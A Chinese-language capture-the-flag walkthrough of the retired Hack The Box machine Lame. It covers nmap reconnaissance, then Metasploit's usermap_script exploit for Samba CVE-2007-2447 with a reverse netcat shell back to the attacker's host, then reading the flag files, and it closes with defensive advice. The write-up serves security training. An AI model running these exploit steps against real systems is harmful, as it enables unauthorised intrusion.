HTB: Lame 渗透测试
字数 972 2025-08-15 21:34:01

HTB: Lame 渗透测试教学文档

1. 靶机概述

Hack The Box (HTB) 是一个在线渗透测试平台,提供模拟真实环境的靶机用于技能提升。Lame 是其中一台已退役的靶机,主要特点如下:

  • IP地址:10.129.104.53(注:实际IP可能因退役而变化)
  • 难度级别:简单
  • 主要漏洞:Samba 3.0.20 版本的用户名映射脚本漏洞

2. 信息收集阶段

2.1 初始扫描

使用Nmap进行全端口扫描和版本探测:

nmap -p- -A -O 10.129.104.53

扫描结果:

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)

2.2 服务分析

  1. FTP服务 (21端口)

    • 版本:vsftpd 2.3.4
    • 已知漏洞:后门漏洞(CVE-2011-2523),但本靶机可能不受影响
  2. SSH服务 (22端口)

    • 版本:OpenSSH 4.7p1
    • 较旧版本,但无直接可利用漏洞
  3. Samba服务 (139/445端口)

    • 版本:3.0.20-Debian
    • 关键漏洞点:用户名映射脚本漏洞

3. 漏洞探测与利用

3.1 漏洞搜索

针对Samba 3.0.20版本搜索可利用漏洞:

searchsploit Samba 3.0.20

发现Metasploit中存在可利用脚本:

exploit/multi/samba/usermap_script

3.2 Metasploit利用步骤

  1. 启动Metasploit框架:
msfconsole
  1. 搜索并选择漏洞利用模块:
search Username map script
use exploit/multi/samba/usermap_script
  1. 设置payload:
set payload cmd/unix/reverse_netcat
  1. 配置必要参数:
set RHOSTS 10.129.104.53
set RPORT 445
set LHOST [你的本地IP]
set LPORT 4444  # 默认端口,可保持
  1. 执行攻击:
exploit

3.3 漏洞原理

该漏洞(CVE-2007-2447)存在于Samba 3.0.20-3.0.25rc3版本中,当配置文件中包含:

username map script = /etc/samba/usermap.sh

时,攻击者可以通过在用户名中嵌入shell元字符来执行任意命令。

4. 后渗透阶段

成功利用后将获得一个反向shell连接,可执行以下操作:

  1. 获取用户flag:
cat /home/[用户名]/user.txt
  1. 权限提升:
  • 检查SUID/GUID文件
  • 检查内核版本
  • 检查cron作业
  1. 获取root flag:
cat /root/root.txt

5. 总结与学习要点

  1. 关键学习点

    • Samba服务漏洞识别与利用
    • Metasploit框架的基本使用
    • 反向shell的建立与利用
  2. 扩展研究

    • 研究Samba用户名映射漏洞的详细机制
    • 尝试手动利用而不依赖Metasploit
    • 探索其他可能的攻击路径(如FTP或SSH)
  3. 防御建议

    • 及时更新Samba服务到最新版本
    • 限制Samba服务的网络访问
    • 审查配置文件中的潜在危险选项

6. 参考资源

  1. Hack The Box官网
  2. Samba usermap漏洞详情
  3. Metasploit文档
HTB: Lame 渗透测试教学文档 1. 靶机概述 Hack The Box (HTB) 是一个在线渗透测试平台,提供模拟真实环境的靶机用于技能提升。Lame 是其中一台已退役的靶机,主要特点如下: IP地址:10.129.104.53(注:实际IP可能因退役而变化) 难度级别:简单 主要漏洞:Samba 3.0.20 版本的用户名映射脚本漏洞 2. 信息收集阶段 2.1 初始扫描 使用Nmap进行全端口扫描和版本探测: 扫描结果: 2.2 服务分析 FTP服务 (21端口) 版本:vsftpd 2.3.4 已知漏洞:后门漏洞(CVE-2011-2523),但本靶机可能不受影响 SSH服务 (22端口) 版本:OpenSSH 4.7p1 较旧版本,但无直接可利用漏洞 Samba服务 (139/445端口) 版本:3.0.20-Debian 关键漏洞点:用户名映射脚本漏洞 3. 漏洞探测与利用 3.1 漏洞搜索 针对Samba 3.0.20版本搜索可利用漏洞: 发现Metasploit中存在可利用脚本: 3.2 Metasploit利用步骤 启动Metasploit框架: 搜索并选择漏洞利用模块: 设置payload: 配置必要参数: 执行攻击: 3.3 漏洞原理 该漏洞(CVE-2007-2447)存在于Samba 3.0.20-3.0.25rc3版本中,当配置文件中包含: 时,攻击者可以通过在用户名中嵌入shell元字符来执行任意命令。 4. 后渗透阶段 成功利用后将获得一个反向shell连接,可执行以下操作: 获取用户flag: 权限提升: 检查SUID/GUID文件 检查内核版本 检查cron作业 获取root flag: 5. 总结与学习要点 关键学习点 : Samba服务漏洞识别与利用 Metasploit框架的基本使用 反向shell的建立与利用 扩展研究 : 研究Samba用户名映射漏洞的详细机制 尝试手动利用而不依赖Metasploit 探索其他可能的攻击路径(如FTP或SSH) 防御建议 : 及时更新Samba服务到最新版本 限制Samba服务的网络访问 审查配置文件中的潜在危险选项 6. 参考资源 Hack The Box官网 Samba usermap漏洞详情 Metasploit文档